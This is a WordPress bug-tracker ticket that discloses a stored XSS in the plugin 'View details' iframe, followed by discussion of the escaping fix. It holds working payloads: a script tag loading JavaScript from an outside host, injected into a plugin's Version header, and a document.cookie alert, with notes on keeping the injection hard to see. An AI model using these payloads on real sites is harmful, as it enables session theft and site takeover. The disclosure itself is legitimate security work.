Opened 3 years ago
Closed 3 years ago
#53020 closed defect (bug) (fixed)
Stored XSS via «View details» plugin iFrame
Reported by: | anonymized_17160716 | Owned by: | SergeyBiryukov |
---|---|---|---|
Milestone: | 5.8 | Priority: | normal |
Severity: | normal | Version: | 5.8 |
Component: | Security | Keywords: | has-patch |
Focuses: | administration | Cc: |
Description
I found a way to use the XSS attack vector - through an iFrame with a detailed description of the plugin (plugin «View details» iFrame).
Possible operation options:
- substitution or modification of the original plug-in to hide malicious code;
- distribution of the modified plugin through third-party resources.
Steps To Reproduce:
- open any existed plugin from the official WordPress repo, f.e. Hello Dolly.
- change the version number to +1 (as a minimum) - from
Version: 1.7.2
toVersion: 1.7.3
. - add your payload right after the last digit -
Version: 1.7.3<script src="https://m0ze.ru/payload.a.js"></script>
- check the plugin info via dashboard, «View details» link.
If you use the payload specifically as a <script src=...></script>
, then visually, except for one digit in the plugin version, nothing will change. Other payloads also work (<script>alert(document.cookie)</script>
etc.), but they add extra special characters on the right of the plugin version, which may alert the website administrator.
Screenshots:
Code:
/wp-admin/includes/plugin-install.php, 881-884:
case 'newer_installed':
/* translators: %s: Plugin version. */
echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
break;
Quick fix:
strip_tags($status['version'])
Video:
YouTube short demo: https://youtu.be/_IRcQ82wovY
Impact
Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
There is also an unknown number of plugins that display diagnostic information about the site, including the names and versions of plugins, where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other plugins.
Attachments (1)
Change History (7)
#2
@
3 years ago
Hi @ayeshrajans.
Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.
On the H1 platform, this XSS issue wasn't considered as a vulnerability, so the WordPress Staff member closed the report with N/A status and I was told to write all details right here, in a new ticket.
#3
@
3 years ago
- Milestone changed from Awaiting Review to 5.8
Hi there, welcome to WordPress Trac! Thanks for the report.
I think we'd want to use esc_html()
here instead of strip_tags()
, for consistency with how contributor names are escaped earlier. Looks good to me otherwise.
#4
@
3 years ago
@SergeyBiryukov hi there. Thank you :)
I think we'd want to use esc_html() here instead of strip_tags(), for consistency with how contributor names are escaped earlier.
Yep, got it!
#5
@
3 years ago
- Keywords has-patch added; needs-patch removed
I wanted to note that in order to test this, if using the Hello Dolly plugin. It must first be deleted and then reinstalled so that the newer_installed
case will be reached. If the one that comes by default is used it will only go to install
.
Thanks for the report @m0ze. Not without some tinkering, but I could reproduce this issue, and I think it's really we ought to fix.
Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.